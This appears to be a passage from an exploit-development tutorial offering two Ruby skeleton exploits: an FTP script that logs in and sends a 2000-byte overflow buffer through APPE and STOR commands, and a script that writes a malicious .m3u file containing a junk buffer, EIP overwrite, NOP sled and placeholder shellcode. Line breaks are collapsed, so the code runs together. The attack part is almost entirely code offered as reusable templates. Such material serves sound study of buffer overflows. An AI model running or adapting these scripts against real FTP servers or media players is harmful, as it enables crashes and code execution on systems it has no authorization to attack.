It's really a good thing to have a skeleton exploit to edit and use quickly during your exploitation process.
#!/usr/bin/env ruby# KING SABRI | @KINGSABRIrequire 'socket'​buffer = "A" * 2000​#--> Networkinghost = ARGV[0]port = ARGV[1] || 21​s = TCPSocket.open(host, port)s.recv(1024)puts "[+] Sending Username."s.send("USER ftp\r\n", 0)s.recv(1024)puts "[+] Sending Password."s.send("PASS ftp\r\n", 0)s.recv(1024)puts "[+] Sending Evil buffer..."s.send("APPE " + buffer + "\r\n", 0)total = s.send("STOR " + buffer + "\r\n", 0)#--> Exploit Infoputs "[+] " + "Total exploit size: " + "#{total} bytes."puts "[+] " + " Buffer length: " + "#{buffer.size} bytes."puts "[+] Done"​s.close
To execute it
ruby ftp_exploit.rb [TARGET] [PORT]
Notice that some services has to receive from it and some does not.
Creating a simple exploit file
#!/usr/bin/env ruby# KING SABRI | @KINGSABRI​file = ARGV[0] || "exploit.m3u"​junk = "A" * 2000eip = "B" * 4nops = "\x90" * 8shell = "S" * 368exploit = junk + eip + nops + shell​File.open(file, 'w') {|f| f.write(exploit)}puts "[*] Exploit size: #{exploit.size}"
To execute it
ruby m3u_exploit.rb song1.m3u